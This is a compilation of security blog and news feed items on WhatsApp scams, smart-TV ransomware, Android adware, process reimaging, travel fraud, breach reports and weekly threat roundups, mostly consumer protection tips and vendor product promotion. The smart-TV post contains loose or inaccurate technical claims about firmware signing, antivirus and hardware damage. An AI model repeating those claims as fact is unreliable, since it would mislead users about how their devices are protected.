Employees are the backbone for maintaining cybersecurity decorum. Hence, enterprises should consider taking employees into consideration and be confident about them as they look to implement cybersecurity solutions. They must be made aware of the dangers of weak enterprise security, the steps they can take and the warning signs they should look for. Since cyberthreats are highly dynamic and dangerous, if organizations don’t train employees properly, they are highly prone to be internal agents and channels of a guaranteed cyberattack.

After covering these flaws internally, enterprises should choose to invest in proven cybersecurity solutions such as Seqrite Endpoint Security (EPS) which offers a simple and comprehensive platform integrating several advanced technologies in one place for protection against advanced cyber threats.

EPS also comes packed with other vital features such as –

  • Web Filtering
  • Application Control
  • Vulnerability Scan
  • Patch Management
  • File Activity Monitor
  • IDS/IPS Protection

The post Enterprises can begin securing their endpoints by following these five simple steps. appeared first on Seqrite Blog.

Be Wary of WhatsApp Messages Offering 1000GB of Free Data

Global messaging giant WhatsApp turned 10 years old this year. It’s not unusual for companies to provide loyal customers or members with gifts to show their appreciation during these milestones. Unfortunately, cybercriminals are using this as a ploy to carry out their malicious schemes. According to Forbes, security researchers have discovered a fraudulent message promising users 1000GB of free internet data, which is a scam bringing in ad click revenue for cybercriminals.

Let’s dive into the details of this suspicious message. The text reads “WhatsApp Offers 1000GB Free Internet!” and includes a link to click on for more details. However, the link provided doesn’t use an official WhatsApp domain. Many users might find this confusing since some businesses do run their promotions through third-party organizations. Forbes states that once a user clicks on the link, they are taken to a landing page that reads “We offer you 1000 GB free internet without Wi-Fi! On the occasion of our 10th anniversary of WhatsApp.” To make the user feel like they need to act fast, the landing page also displays a bright yellow countdown sticker warning that there are a limited number of awards left.

As of now, it doesn’t appear that the link spreads malware or scrapes users’ personal information. However, the scam could eventually evolve into a phishing tactic. Additionally, the more users click on the fraudulent link, the more the cybercriminals behind this scheme rack up bogus ad clicks. This ultimately brings in revenue for the cybercrooks, encouraging them to continue creating these types of scams. For example, the domain being used by the scammers behind the WhatsApp message also hosts other fake brand-led promotional offers for Adidas, Nestle, Rolex, and more.

So, what can users do to prevent falling for these phony ads? Check out the following tips to help you stay secure:

  • Avoid interacting with suspicious messages. Err on the side of caution and don’t respond to direct messages from a company that seems out of the ordinary. If you want to know if a company is participating in a promotional offer, it is best to go directly to their official site to get more information.
  • Be careful what you click on.If you receive a message in an unfamiliar language, one that contains typos, or one that makes claims that seem too good to be true, avoid clicking on any attached links.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help safeguard you from malware and warn you of phishing attempts so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Be Wary of WhatsApp Messages Offering 1000GB of Free Data appeared first on McAfee Blogs.

Can a Smart TV Get a Virus?

Asking the real questions here – can a smart TV get a virus? We’re about to find out. If you’re into gaming or streaming, you’ve probably bought yourself a wide QLED.

Smart TVs are awesome since they give you access to tons of content without the need to use an intermediary – remember when you had to hook up your desktop or laptop to the TV just to see a movie?

Since most smart TVs out there run an OS akin to Android, the question about whether or not TVs can get viruses seems only natural. So, if you’re still worried about someone hijacking your smart during an epic streaming night, check out this guide. Enjoy!

It started with a tweet…

Like every ‘great’ Internet smash, the entire smart TV malware gig started with a tweet from Samsung. Try as I might, but I couldn’t get ahold of the said message since the company was kind enough to delete not long after it went live. However, it did not go away quietly (into the night) – pretty soon, people began wondering whether or not their TVs are safe.

Per Samsung’s statements, the tweet was part of their cybersecurity awareness campaign.

Awareness or not, it does pose a rather interesting question: can a smart TV get a virus? Everybody agrees to disagree that the answer is “no” since smarts do not tap into the same resources as PCs, Macs, tablets, or smartphones. True, but not very convincing.

So, I started poking around to seek the answer to this elusive question. Long story short – yes, your smart TV can get a virus if you download stuff that, well, you shouldn’t download. Android TVs are more vulnerable compared to the non-Android models since they have full access to Google Play’s apps library.

Yes, one wrong download and you can probably end up with a bricked set or even with a compromised router. Daunting as it may seem, the chances of this actually happening are slim to none.

Of course, many agree that any kind electronic device can be hacked, but is it really worth it? Think of it this way: if someone were to hack his way into your PC, he could steal precious stuff like financial info. That’s a prize worth having.

Thor Foresight makes sure that link is safe!
Your parents and friends will click any suspicious link, so make sure they're protected.
Thor Foresight Home anti malware and ransomware protection heimdal security
Thor Foresight provides: Automatic and silent software updates Smart protection against malware Compatibility with any traditional antivirus.


Get Thor Foresight

Stepping up the game

First of all, a wide-spread cyberattack should be capable of targeting several types of chipsets. It’s true that most smart TVs use ARM- or MIPS-based cores, but the tech itself used to bring the sets to life, differs from that employed to build PCs or smartphones.

That would be the first limitation. The second one would be the fact that all TV operating systems are written in ‘read-only’ form, which means that the set itself can view and read the code, but it cannot write or overwrite on its own accord.

So, what does that even mean? Well, it kind of translates to someone having to redo the whole code to change the attribute from ‘read-only’ to ‘read-and-write’. Sounds easy enough on paper, but reality says otherwise; no one’s going through that much trouble just to hack a TV set!

Another ‘countermeasure’ smart TV manufacturers use is the digital signature. Each time a new firmware update becomes available, it simply overwrites the old one. Being digitally-signed means that in the event that malware does find its way inside your TV, it will simply be picked up by the in-built antivirus and deleted.

Now, even if the malware manages to evade detection (and that’s a very big ‘if’), worst case scenario – it will gain access to the TV’s config & general settings sections. Not much damage it can do from there (maybe trigger a voltage overload in those CPU cores or something).

So can a smart TV get a virus?

Not quite – TVs, just like any other electronics, CAN become infected. Well, that’s a bummer – how can a device get and not get infected at the same time? Let me try to clear things up a bit. So, for a TV to get viruses, Trojans, or any kind of ransomware, you would need to perform a specific set of actions.

For instance, if you insert a USB flash stick that harbors a bug, then your smart TV gets infected. It’s as easy as that. There’s even a story to go along with that claim; several of them, actually.

Fishing for Trojans

Apparently, in 2015, a Tom’s Guide user reported that he unwillingly transformed his Samsung smart TV into a breeding pool for trojans. As the story goes, the user plugged a USB stick into the TV without knowing that the stick was infected with win32.waldek.ACL, a trojan notorious for its ability to reconfigure the affected machine’s DNS and to restrict access to some websites.

Nothing appears to have happened to the TV, but once the user inspected the thumb drive on a computer, he saw that it was indeed infected with that particular trojan. His AV managed to bust the win32 variant, without any issues.

However, each time he would plug the stick into his TV and then back into the PC, his AV would detect an infection. I don’t know how this story ends, but I guess returning the set to its factory setting can root out just about any kind of malware from the smart TV’s buffer.

There are other accounts of smarts getting bitten by the ‘love bug’.

When gaming turns…viral

During the same year, Candid Wueest, a cybersecurity researcher managed to prove what others couldn’t: that someone can hold your TV for ransom. In other words, ransomware’s universal. Now, keep in mind that Wueest’s ‘experiment’ worked because, well, he wanted it to work.

Here’s how it went down: in his demo, Wueest managed to infect a Sony Android TV with ransomware using a Man-in-the-Middle attack, by replacing a game installation file with ransomware. As a result, the TV locked itself up. What’s even worse is that you can’t do anything because there’s no way of actually clicking on the instructions’ link to see the payment details.

So, yes, it’s possible, but certain conditions must be met. First of all, the researcher was able to access the network path; IRL that could happen if the hacker was either on the same network as his victim or hijacks the victim’s DNS resolution.

Second, before starting this unlikely experiment, he enabled the TV’s Android ADB debugging feature, which granted him access to some pretty advanced features. Last, but not least, he knew where the experiment was headed and how it would end.

He eventually purged the ransomware by using the ADB shell. Lesson learned – it can happen, but there’s a boorishly long list of ifs to go along with that assumption.

Sis’s sys got pwned

The winter of 2016 brings us yet another case of what appears to be a ransomware infiltration. Lucky for us, this wasn’t another experiment, but the real McCoy. According to Reddit user u/tell_me_im_funny, his sister’s LG smart became infected while she was navigating on the TV’s web browser.

A couple of minutes later, the set got ‘bricked’, the only thing capable of displaying would be a message reading “Your computer has been infected, please gib money to fix it.”

This time, there was no ADB shell, no access to the network pathway, and no one to call for help. In a later ad-lib, the user said that he managed to ‘unbrick’ his sister’s TV by performing a hard-reset (returning the TV to the factory settings).

Netflix is so gauche

And in hoping I haven’t bored you to death with my cybersec ‘penny dreadfuls’, the last story comes all the way from Kansas. Darren Cauthon, the protagonist and a software dev in his spare time, said that back in 2015, his Google Android-powered smart tv picked up a bug during his attempt at downloading a movie-streaming application.

Cauthon recalled streaming some flick when all of a sudden, the screen froze. Naturally, he tried rebooting the TV. However, upon restart, instead of the familiar LG start screen, Cauthon was met by a message allegedly sent by the Federal Bureau of Investigation. Apparently, the software dev was informed that due to some “suspicious files”, the device has been locked. The full text reads:

Department of Justice
Federal Bureau of Investigation

FBI Headquarters

Washington DC Department, USA

As a result of full scanning of your device, some suspicious files have been found and your attendance of the forbidden pornographic sites has been fixed. For this reason, your device has been locked. Information on your location and snapshots containing your face have been uploaded on the FBI Cyber Crime Department’s Datacenter.

Of course, Cauthon’s first thought was ransomware. And yes, his hunch was right – after downloading the wrong movie-streaming app, his TV became infected with FLocker, otherwise known as Dogspectus or Frantic Locker, a Cyber.Police ransomware variant. Since the bug made it into his TV and not his PC or phone, Cauthon was able to get rid of it by returning the set to its factory settings.

What’s there to be done if your TV does get a virus?

For the sake of argument, let’s say your smart TV picks up a trojan or ransomware. What are you going to do then? Well, there are several ways to root out malware from your device. Check these out.

1. Force-scan the TV and attached storage devices

Most modern smart TVs have in-built antivirus software. Sure, it’s signature-based and wouldn’t make much of a difference in case of Advanced Persistent Threats, but still better than nothing.

Keep in mind that your TV’s AV is not as sophisticated as the one on your computer. Certain functions like auto-scan or scheduled scans may not be available. So, it’s up to you to conduct periodical scans of your device. Here’s what to do:

Step 1. Navigate to Settings using your remote.

Step 2. Go to General Settings.

Step 3. Head to System Manager.

Step 4. Under Smart Security, click on Scan.

Step 5. Enjoy a virus-free streaming experience!

(*) This method applies to Samsung smart TVs. For other brands, please consult the user’s manual. Look for things like “smart security”, “smart hub”, or “online security.

2. Return TV to factory settings

Just like Cauthon, you could return your smart TV to factory settings in case of a ransomware infection. Bear in mind that in a Denial-of-Service attack, some or all of your TV’s functions will be disabled. This means that you will need to find an alternative way to do that. My advice to you would contact your brand’s customer service for technical info.

Now, if you’re the ‘proud’ owner of Samsung smart just like I am, you can find the reset to the factory settings option in Support, under Self-Diagnosis. Keep in mind that you might be required to provide your PIN code to complete the operation (if you haven’t messed around with the security settings, the default PIN is 0000).  Bon chance!

3. Regular software updates

Yes, I know that this tip does not qualify as a fix, but you know how it goes with that proverbial ounce of prevention. Anyway, keep your TV’s firmware and all downloaded apps up to date. Almost all smart TVs have an auto-updater or, rather, semi-auto update feature since it will prompt you to install the latest version.

If you have an older set, try checking at least once per month for any updates. Do the same for your apps. Why keeping everything up to date? Because over 80 percent of malware infections occur due to outdated apps which turn into breach points.

4. Wired over wireless

If you can choose between a wired and a wireless connection, go with the first. Wired connections are harder to hack compared to the wireless ones. Of course, there’s the entire cable management issue, but everything can be solved with a bit of patience and some cable ties.

5. Avoid shady vendors

Now, if that TV really can’t wait, do yourself a favor and buy yours from a legit vendor. Don’t fall for bogus discounts, giveaways, or whatnots because that’s how you end up with rip-offs and malware-infected devices. Lesson learned – say YES to Samsung or LG and NO to Samysung or MG.

6. Refrain from plugging (infected) USB sticks into your TV

Seems pretty obvious, but I still need to say it: never, ever stick a malware-infected memory stick or portable hard-drive into your smart TV. It would be wise to run a quick scan on your PC or Mac before plugging in the stick. And I wouldn’t recommend using sticks other than your own.

7. Ditch generic web browsers

If you don’t have an Android smart TV, then you’ve no other choice but to use the in-built one. Now, if you really don’t like the default one, you should stick with the usual ‘suspects’ like Chrome, Mozilla, Firefox, Opera, or Brave. Why? Because they’re much more secure compared to generic ones.


So, can a smart TV get a virus? That would be a “yes”. Still, you should take this with a grain of salt – sure, malware can brick your TV or whatever, but it’s still not nearly as dramatical compared to what would happen if the same bug got into your computer.

As always, keep your apps up to date, perform regular scans, avoid dubious memory sticks, and stick with the big brands. For any question, comments, rants, or suggestions, feel free to shoot me a comment. Cheers!

The post Can a Smart TV Get a Virus? appeared first on Heimdal Security Blog.

Briton who helped stop 2017 WannaCry virus spared jail over malware charges

  • Marcus Hutchins pleaded guilty to two malware charges
  • 25-year-old ‘incredibly thankful’ to be sentenced to time served

The British computer expert who helped shut down the WannaCry cyberattack on the NHS said he is “incredibly thankful” after being spared jail in the US for creating malware.

Marcus Hutchins was hailed as a hero in May 2017 when he found a “kill switch” that slowed the effects of the WannaCry virus affecting more than 300,000 computers in 150 countries.

Related: FTSE 250 firms exposed to possible cyber-attacks, report finds

Continue reading...

Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware

With over 2.5 billion monthly active users that have accumulated since its fruition, Android has seen massive growth over the last 10 years. With so many users, it’s no wonder why cybercriminals continuously look to exploit Android devices. In fact, 25 million Android users have recently been hit with a new malware.

Dubbed Agent Smith, this cyberthreat sneaks onto a user’s device when the user downloads a malicious app from the app store, like a photo utility or game app. The app then silently installs the malware disguised as a legitimate Google updating tool. However, no updating icon appears on the screen, making the user oblivious to their device being in danger. Once installed, the malware replaces legitimate apps on the user’s phone, such as WhatsApp, with an evil update that serves bad ads. According to security researchers, the ads themselves aren’t malicious. But if a victim accidentally clicks on the ad, the hackers can make money from these ad fraud schemes. What’s more, there’s potential that these bad ads aren’t limited to just WhatsApp and could be found on other platforms as well.

So, what can Android users do to prevent this malware from sneaking onto their device? Check out the following tips to help stay secure:

  • Be wary of WhatsApp ads. Android users should take action if they experience advertisements displayed at strange times, such as when they open WhatsApp. The legitimate WhatsApp does not serve ads, so if you experience ads on this platform your device might have been infected.
  • Look out for suspicious apps. Check the apps and notifications section of your Android settings. If you see suspicious apps with names such as Google Updater, Google Installer for U, Google Powers, and Google Installer, uninstall these apps right away.
  • Stay away from unofficial Android stores. Google has extra precautions designed to prevent malware from getting onto the official Android store website, so only downloading apps from there could help protect you.
  • Use a security solution. A solution like McAfee Mobile Security can help Android users stay protected from threats like mobile malware. It also provides a free antivirus cleaner and phone security app to protect your online privacy and enhance device performance.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware appeared first on McAfee Blogs.

How do I remove malware from my Windows laptop?

Don’s laptop is infected with malware and he’d like a clean machine, what’s the best way?

What’s the cheapest way to get my Windows laptop swept and cleaned out of malware etc? Don

There are two obvious ways to clean a Windows laptop, and both of them are free. The first is to run a number of anti-malware programs to find and remove the bad stuff. The second is to reset it to factory condition.

Continue reading...

Hacked forensic firm pays ransom after malware attack

Largest private provider Eurofins hands over undisclosed fee to regain control of systems

Britain’s largest private forensics provider has paid a ransom to hackers after its IT systems were brought to a standstill by a cyber-attack, it has been reported.

Eurofins, which is thought to carry out about half of all private forensic analysis, was targeted in a ransomware attack on 2 June, which the company described at the time as “highly sophisticated”. Three weeks later the company said its operations were “returning to normal”, but did not disclose whether or not a ransom had been paid.

Continue reading...

Ransomware As A Tool – LockerGoga

Ransomware authors keep experimenting with the development of payload in various dimensions. In the timeline of ransomware implementations, we have seen its evolution from a simple screen locker to multi-component model for file encryption, from novice approach to a sophisticated one. The Ransomware as a Tool has evolved in wild…

How Chinese spy app allows officials to harvest personal data

Intrusive software collects emails and texts and could be used to track movement

The tourists travelling into China were never supposed to know their phones had been compromised.

The surveillance app being installed on their devices should have been removed by the border officers tasked with the job. But their apparent carelessness has provided a rare insight into the techniques used by China to snoop on visitors and the kind of information being harvested from their phones.

Continue reading...

Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer

If you haven’t seen your kids in a few hours but can hear outbursts of laughter from a nearby room, chances are, they — along with millions of other kids — are watching YouTube. The popular digital video hub has more viewers than network television and soaks up more than 46,000 years of our collective viewing time annually. Chances are your kids will be part of the YouTube digital mosh pit this summer, but do you know the risks?

Types of screen time

The quality of online time for kids usually shifts during the summer months. For example, there’s active screen time and passive screen time. Knowing the difference between the two can help your family decide best how to balance device use — especially when it comes to consuming endless hours on YouTube.

Active screen time requires a person’s cognitive and/or physical engagement and develops social, language, or physical skills. Engaging in activities such as researching, creating original content, learning a new program, and playing educational games is considered active screen usage. Active screen time tends to go up during the school year and down in the summer.

Passive screen time is passively absorbing information via a screen, app, or game for entertainment reasons only. This includes scrolling through social networks, watching movies binge watching), and watching YouTube videos. Little to no thought or creativity is required when a person engages in repetitious, passive screen activities.

According to a Common Sense Media study, children ages 8 to 12, spend nearly six hours per day using media, and teenagers average closer to nine hours a day (numbers don’t include school work). It’s safe to say that during the summer, these numbers climb even higher — as do the risks.

Here are a few ways to balance screen time and boost safety on YouTube this summer.

YouTube: 5 Family Talking Points

  • Explore YouTube.The best way to understand the culture of YouTube is to spend time there. Ask your kids about their favorite channels and what they like about them. Get to know the people they follow — after all, these are the people influencing your child. Here’s a sampling of a few top YouTubers: MattyBRaps (music), JoJoSiwa (music, dance), Brooklyn and Bailey (vlogs, challenges, music), Baby Ariel (challenges, vlog), Johnny Orlando (music), PewDiePie (comedy), Jacy and Kacy (crafts, challenges), (Bethany Mota (shopping hauls), Grav3yardgirl (makeup), Smosh (comedy).
  • Respect age limits. YouTube is packed with humor, tutorials, pranks, vlogs, music, reviews, and endlessly engaging content. However, age limits exist for a good reason because the channel also has its share of dangerous content. The darker side of YouTube is always just a click away and includes sexual content, hate content, harassment and cyberbullying, violent and graphic content, and scams.
  • Turn on restricted mode. By turning on the restricted mode you can block videos with mature content from a user’s searches, related videos, playlists, and shows — this is a big deal since many “up next” videos (on the right side of the screen) are cued to play automatically and can lead kids to sketchy content. In addition to the restricted mode, consider an extra layer of protection with filtering software for all your family devices.
  • Opt for YouTube Kids. For kids under 13, YouTube Kids is a safe video platform, specially curated for young viewers. Kids may snub any platform designed “for kids,” however, if you are worried about younger kids running into inappropriate content, this is your best video option.
  • Discuss the ‘why’ behind the rules. As a parent, you know the possible ways YouTube — or other social platforms — can be harmful. Don’t assume your kids do. Kids are immersed in their peer groups online, which means danger and harm aren’t primary concerns. Even so, before you lecture kids about the dangers of YouTube, open up a dialogue around the topic by asking great questions. Here are just a few to get you started:

  • Do you understand why it’s important to filter YouTube content and respect age limits (inappropriate content, cyberbullying)?
  • Do you understand why unboxing and makeup videos are so popular (advertisers want you to purchase)?
  • Do you understand why we need to balance between screen time this summer? (mental, physical health)
  • Do you know why this piece of content might be fake or contain questionable information (conspiracy, hate, or political videos)?

As the public increasingly demands social networks do more to remove harmful or objectionable content, one thing is clear: Despite strides in this area by a majority of platforms, no online social hub is (or will likely ever be) 100% safe. The best way to keep kids safe online is by nurturing a strong parent-child connection and having consistent conversations designed to equip and educate kids about digital risks and responsibility.

The post Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer appeared first on McAfee Blogs.

Beware! Email attachments can make you victim of spear phishing attacks

In the last few months, we’ve seen a sudden increase in Spear Phishing attacks. Spear phishing is a variation of a phishing scam wherein hackers send a targeted email to an individual which appears to be from a trusted source. In this type of attack, the attacker uses social engineering tricks and some…

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimaging leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API dubbed K32GetProcessImageFileName allows endpoint security solutions, like Windows Defender, to verify whether an EXE file associated with a process contains malicious code. However, with process reimaging, a cybercriminal could subvert the security solution’s trust in the windows operating system APIs to display inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misunderstands which file name or path it is looking at and can no longer tell if a process is trustworthy or not. By using this technique, cybercriminals can persist malicious processes executing on a user’s device without them even knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

We here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Often times, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.

Continue reading...

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, hackers first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can potentially snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot off the press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

The DBIR has evolved since its initial release in 2008, when it was payment card data breach and Verizon breach investigations data focused. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by ‘plain English’ astute explanations, reason why then, the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways
      • Financial gain remains the most common motivate behind data breaches (71%)
      • 43% of breaches occurred at small businesses
      • A third (32%) of breaches involved phishing
      • The nation-state threat is increasing, with 23% of breaches by nation-state actors
      • More than half (56%) of data breaches took months or longer to discover
      • Ransomware remains a major threat, and is the second most common type of malware reported
      • Business executives are increasingly targeted with social engineering, attacks such as phishing\BEC
      • Crypto-mining malware accounts for less than 5% of data breaches, despite the publicity it didn’t make the top ten malware listed in the report
      • Espionage is a key motivation behind a quarter of data breaches
      • 60 million records breached due to misconfigured cloud service buckets
      • Continued reduction in payment card point of sale breaches
      • The hacktivist threat remains low, the increase of hacktivist attacks report in DBIR 2012 report appears to be a one-off spike

This Week in Security News: BEC Attacks and Botnet Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the prevalence and impact of BEC attacks. Also, find out how botnet malware can perform remote code execution, DDoS attacks and cryptocurrency mining.

Read on:

Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers

Trend Micro discovered a new technical support scam (TSS) campaign that makes use of iframe in combination with basic pop-up authentication to freeze a user’s browser. 

Cybersecurity Pros Could Work for Multiple Agencies Under Bill Passed by Senate

Skilled federal cybersecurity workers could be rotated among civilian agencies under bipartisan legislation the Senate passed to help fill specific gaps in the workforce. 

New Cybersecurity Report Warns CIOs — ‘If You’re Breached Or Hacked, It’s Your Own Fault’

A new cybersecurity survey conducted by endpoint management specialists 1E and technology market researchers Vanson Bourne, a survey that questioned 600 IT operations and IT security decision-makers across the U.S. and U.K., and found that 60% of the organizations had been breached in the last two years and 31% had been breached more than once.

AESDDoS Botnet Malware Exploits CVE-2019-3396 to Perform Remote Code Execution, DDoS Attacks, and Cryptocurrency Mining

Trend Micro’s honeypot sensors detected an AESDDoS botnet malware variant exploiting a server-side template injection vulnerability in a collaboration software program used by DevOps professionals. 

U.K. Prime Minister Theresa May Fires Defense Secretary Gavin Williamson Over Huawei Leak

British Prime Minister Theresa May fired Defense Secretary Gavin Williamson, saying he leaked sensitive information surrounding a review into the use of equipment from China’s Huawei Technologies Co. in the U.K.’s telecoms network. 

This Hacker Is Selling Dangerous Windows 0-Day Hacks For Past 3 Years

report by ZDNet has revealed that a mysterious hacker is selling Windows zero-day exploits to the world’s most notorious cybercrime groups for the past three years. At least three cyber-espionage groups also known as Advanced Persistent Threats (APTs) are regular customers of this hacker.

Docker Hub Repository Suffers Data Breach, 190,000 Users Potentially Affected

In an email sent to their customers on April 26, Docker reported that the online repository of their popular container platform suffered a data breach that affected 190,000 users. 

IC3: BEC Cost Organizations US$1.2 Billion in 2018

In the recently published 2018 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3), the agency states that in 2018 alone, it received 20,373 BEC/email account compromise (EAC) complaints that racked up a total of over US$1.2 billion in adjusted losses. 

Trend Forward Capital’s First Startup Pitch Competition in Dallas

Trend Forward Capital, in a partnership with Veem, is bringing its Forward Thinker Award and pitch competition to Dallas on May 20. 

BEC Scammers Steal US$1.75 Million From an Ohio Church

The Saint Ambrose Catholic Parish in Brunswick, Ohio was the victim of a BEC attack when cybercriminals gained access to employee email accounts and used them to trick other members of the organization into wiring the payments into a fraudulent bank account. 

Cybersecurity Experts Share Tips And Insights For World Password Day

May 2 is World Password Day. World Password Day falls on the first Thursday in May each year and is intended to raise awareness of password best practices and the need for strong passwords. 

Confluence Vulnerability Opens Door to GandCrab

A vulnerability in a popular devops tool could leave companies with a dose of ransomware to go with their organizational agility, according to researchers at Trend Micro and Alert Logic.

Were you surprised by the amount of business email compromise complaints the FBI received in 2018? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: BEC Attacks and Botnet Malware appeared first on .

APT34: Glimpse project

